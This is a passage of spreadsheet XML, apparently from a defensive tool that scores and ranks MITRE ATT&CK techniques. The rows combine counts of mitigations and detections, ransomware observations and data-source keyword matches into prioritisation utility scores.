      <c r="AC231" s="29" t="s">
        <v>97</v>
      </c>
      <c r="AD231" s="25" t="str" cm="1">
        <f t="array" ref="AD231">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC231)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE231" s="25">
        <f>IF(AD231="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF231" s="25" t="str" cm="1">
        <f t="array" ref="AF231">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC231)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG231" s="25">
        <f>IF(AF231="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH231" s="25" t="str" cm="1">
        <f t="array" ref="AH231">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC231)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI231" s="25">
        <f>IF(AH231="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ231" s="25" t="str" cm="1">
        <f t="array" ref="AJ231">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC231)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK231" s="25">
        <f>IF(AJ231="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL231" s="25" t="str" cm="1">
        <f t="array" ref="AL231">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC231)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM231" s="25">
        <f>IF(AL231="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN231" s="60">
        <v>1</v>
      </c>
      <c r="AO231" s="51">
        <v>1</v>
      </c>
      <c r="AP231" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.0414285714285707E-2</v>
      </c>
      <c r="AQ231" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.1236031746031746</v>
      </c>
      <c r="AR231" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.1236031746031746</v>
      </c>
      <c r="AS231" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT231" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU23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32" spans="1:47" ht="32.1">
      <c r="A232" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.1166666666666664E-2</v>
      </c>
      <c r="B232" s="25">
        <f>SUM(H232,M232,V232)*(1+SUM(AE232,AG232,AI232,AK232,AM232))</f>
        <v>0.41166666666666668</v>
      </c>
      <c r="C232" s="25" t="s">
        <v>999</v>
      </c>
      <c r="D232" s="25" t="s">
        <v>245</v>
      </c>
      <c r="E232" s="25" t="s">
        <v>737</v>
      </c>
      <c r="F232" s="51">
        <v>1</v>
      </c>
      <c r="G232" s="51">
        <v>1</v>
      </c>
      <c r="H232" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I232">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J232">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K232">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L232">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M232" s="25">
        <v>0</v>
      </c>
      <c r="N232" s="51">
        <v>2</v>
      </c>
      <c r="O232" s="51">
        <v>10</v>
      </c>
      <c r="P232" s="51">
        <v>1</v>
      </c>
      <c r="Q232" s="51">
        <v>17</v>
      </c>
      <c r="R232" s="52" t="s">
        <v>246</v>
      </c>
      <c r="S232" s="51">
        <v>4</v>
      </c>
      <c r="T232" s="51" t="s">
        <v>247</v>
      </c>
      <c r="U232" s="51">
        <v>3</v>
      </c>
      <c r="V232" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.2095238095238095</v>
      </c>
      <c r="W232">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>7</v>
      </c>
      <c r="X232">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.12727272727272726</v>
      </c>
      <c r="Y232">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.12727272727272726</v>
      </c>
      <c r="Z232">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>30</v>
      </c>
      <c r="AA232">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.3</v>
      </c>
      <c r="AB232">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.3</v>
      </c>
      <c r="AC232" s="29" t="s">
        <v>1000</v>
      </c>
      <c r="AD232" s="25" t="str" cm="1">
        <f t="array" ref="AD232">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC232)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE232" s="25">
        <f>IF(AD232="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF232" s="25" t="str" cm="1">
        <f t="array" ref="AF232">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC232)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG232" s="25">
        <f>IF(AF232="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH232" s="25" t="str" cm="1">
        <f t="array" ref="AH232">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC232)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI232" s="25">
        <f>IF(AH232="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ232" s="25" t="str" cm="1">
        <f t="array" ref="AJ232">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC232)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK232" s="25">
        <f>IF(AJ232="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL232" s="25" t="str" cm="1">
        <f t="array" ref="AL232">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC232)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AM232" s="25">
        <f>IF(AL232="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN232" s="52">
        <v>0</v>
      </c>
      <c r="AO232" s="51">
        <v>0</v>
      </c>
      <c r="AP232" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.1166666666666664E-2</v>
      </c>
      <c r="AQ232" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.13722222222222222</v>
      </c>
      <c r="AR232" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.13722222222222222</v>
      </c>
      <c r="AS232" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT232" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU23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33" spans="1:47">
      <c r="A233" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.5476190476190481E-2</v>
      </c>
      <c r="B233" s="25">
        <f>SUM(H233,M233,V233)*(1+SUM(AE233,AG233,AI233,AK233,AM233))</f>
        <v>0.35476190476190483</v>
      </c>
      <c r="C233" s="25" t="s">
        <v>1001</v>
      </c>
      <c r="D233" s="25" t="s">
        <v>1002</v>
      </c>
      <c r="E233" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F233" s="51">
        <v>2</v>
      </c>
      <c r="G233" s="51">
        <v>1</v>
      </c>
      <c r="H233" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.15000000000000002</v>
      </c>
      <c r="I233">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.2</v>
      </c>
      <c r="J233">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="K233">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L233">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M233" s="25">
        <v>0</v>
      </c>
      <c r="N233" s="51">
        <v>1</v>
      </c>
      <c r="O233" s="51">
        <v>3</v>
      </c>
      <c r="P233" s="51">
        <v>0</v>
      </c>
      <c r="Q233" s="51">
        <v>1</v>
      </c>
      <c r="R233" s="51" t="s">
        <v>1003</v>
      </c>
      <c r="S233" s="51">
        <v>9</v>
      </c>
      <c r="T233" s="51" t="s">
        <v>1004</v>
      </c>
      <c r="U233" s="51">
        <v>10</v>
      </c>
      <c r="V233" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.20476190476190478</v>
      </c>
      <c r="W233">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>19</v>
      </c>
      <c r="X233">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.34545454545454546</v>
      </c>
      <c r="Y233">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.34545454545454546</v>
      </c>
      <c r="Z233">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>5</v>
      </c>
      <c r="AA233">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.05</v>
      </c>
      <c r="AB233">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.05</v>
      </c>
      <c r="AC233" s="29"/>
      <c r="AD233" s="25" t="str" cm="1">
        <f t="array" ref="AD233">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC233)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE233" s="25">
        <f>IF(AD233="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF233" s="25" t="str" cm="1">
        <f t="array" ref="AF233">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC233)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG233" s="25">
        <f>IF(AF233="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH233" s="25" t="str" cm="1">
        <f t="array" ref="AH233">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC233)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI233" s="25">
        <f>IF(AH233="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ233" s="25" t="str" cm="1">
        <f t="array" ref="AJ233">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC233)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK233" s="25">
        <f>IF(AJ233="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL233" s="25" t="str" cm="1">
        <f t="array" ref="AL233">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC233)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM233" s="25">
        <f>IF(AL233="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN233" s="60">
        <v>0</v>
      </c>
      <c r="AO233" s="51">
        <v>0</v>
      </c>
      <c r="AP233" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.5476190476190481E-2</v>
      </c>
      <c r="AQ233" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.11825396825396828</v>
      </c>
      <c r="AR233" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.11825396825396828</v>
      </c>
      <c r="AS233" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT233" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU23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34" spans="1:47" ht="32.1">
      <c r="A234" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.13449904761904763</v>
      </c>
      <c r="B234" s="25">
        <f>SUM(H234,M234,V234)*(1+SUM(AE234,AG234,AI234,AK234,AM234))</f>
        <v>0.34499047619047624</v>
      </c>
      <c r="C234" s="25" t="s">
        <v>1005</v>
      </c>
      <c r="D234" s="25" t="s">
        <v>180</v>
      </c>
      <c r="E234" s="25" t="s">
        <v>1006</v>
      </c>
      <c r="F234" s="51">
        <v>1</v>
      </c>
      <c r="G234" s="51">
        <v>1</v>
      </c>
      <c r="H234" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I234">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J234">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K234">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L234">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M234" s="25">
        <v>0</v>
      </c>
      <c r="N234" s="51">
        <v>0</v>
      </c>
      <c r="O234" s="51">
        <v>1</v>
      </c>
      <c r="P234" s="51">
        <v>0</v>
      </c>
      <c r="Q234" s="51">
        <v>0</v>
      </c>
      <c r="R234" s="52" t="s">
        <v>181</v>
      </c>
      <c r="S234" s="51">
        <v>10</v>
      </c>
      <c r="T234" s="51" t="s">
        <v>1007</v>
      </c>
      <c r="U234" s="51">
        <v>11</v>
      </c>
      <c r="V234" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.20476190476190478</v>
      </c>
      <c r="W234">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>21</v>
      </c>
      <c r="X234">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.38181818181818183</v>
      </c>
      <c r="Y234">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.38181818181818183</v>
      </c>
      <c r="Z234">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA234">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB234">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC234" s="29" t="s">
        <v>183</v>
      </c>
      <c r="AD234" s="25" t="str" cm="1">
        <f t="array" ref="AD234">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC234)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE234" s="25">
        <f>IF(AD234="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF234" s="25" t="str" cm="1">
        <f t="array" ref="AF234">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC234)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG234" s="25">
        <f>IF(AF234="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH234" s="25" t="str" cm="1">
        <f t="array" ref="AH234">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC234)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI234" s="25">
        <f>IF(AH234="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ234" s="25" t="str" cm="1">
        <f t="array" ref="AJ234">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC234)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK234" s="25">
        <f>IF(AJ234="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL234" s="25" t="str" cm="1">
        <f t="array" ref="AL234">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC234)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM234" s="25">
        <f>IF(AL234="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN234" s="60">
        <v>3</v>
      </c>
      <c r="AO234" s="51">
        <v>1</v>
      </c>
      <c r="AP234" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.13449904761904763</v>
      </c>
      <c r="AQ234" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.11499682539682542</v>
      </c>
      <c r="AR234" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.11499682539682542</v>
      </c>
      <c r="AS234" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AT234" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AU23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35" spans="1:47" ht="48">
      <c r="A235" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.4499047619047624E-2</v>
      </c>
      <c r="B235" s="25">
        <f>SUM(H235,M235,V235)*(1+SUM(AE235,AG235,AI235,AK235,AM235))</f>
        <v>0.34499047619047624</v>
      </c>
      <c r="C235" s="25" t="s">
        <v>1008</v>
      </c>
      <c r="D235" s="25" t="s">
        <v>447</v>
      </c>
      <c r="E235" s="25" t="s">
        <v>1009</v>
      </c>
      <c r="F235" s="51">
        <v>1</v>
      </c>
      <c r="G235" s="51">
        <v>1</v>
      </c>
      <c r="H235" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I235">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J235">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K235">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L235">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M235" s="25">
        <v>0</v>
      </c>
      <c r="N235" s="51">
        <v>1</v>
      </c>
      <c r="O235" s="51">
        <v>3</v>
      </c>
      <c r="P235" s="51">
        <v>0</v>
      </c>
      <c r="Q235" s="51">
        <v>1</v>
      </c>
      <c r="R235" s="52" t="s">
        <v>100</v>
      </c>
      <c r="S235" s="51">
        <v>8</v>
      </c>
      <c r="T235" s="52" t="s">
        <v>448</v>
      </c>
      <c r="U235" s="51">
        <v>11</v>
      </c>
      <c r="V235" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.20476190476190478</v>
      </c>
      <c r="W235">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>19</v>
      </c>
      <c r="X235">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.34545454545454546</v>
      </c>
      <c r="Y235">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.34545454545454546</v>
      </c>
      <c r="Z235">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>5</v>
      </c>
      <c r="AA235">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.05</v>
      </c>
      <c r="AB235">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.05</v>
      </c>
      <c r="AC235" s="29" t="s">
        <v>1010</v>
      </c>
      <c r="AD235" s="25" t="str" cm="1">
        <f t="array" ref="AD235">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC235)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE235" s="25">
        <f>IF(AD235="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF235" s="25" t="str" cm="1">
        <f t="array" ref="AF235">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC235)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG235" s="25">
        <f>IF(AF235="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH235" s="25" t="str" cm="1">
        <f t="array" ref="AH235">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC235)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI235" s="25">
        <f>IF(AH235="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ235" s="25" t="str" cm="1">
        <f t="array" ref="AJ235">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC235)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK235" s="25">
        <f>IF(AJ235="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL235" s="25" t="str" cm="1">
        <f t="array" ref="AL235">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC235)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM235" s="25">
        <f>IF(AL235="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN235" s="60">
        <v>0</v>
      </c>
      <c r="AO235" s="51">
        <v>0</v>
      </c>
      <c r="AP235" s="25">
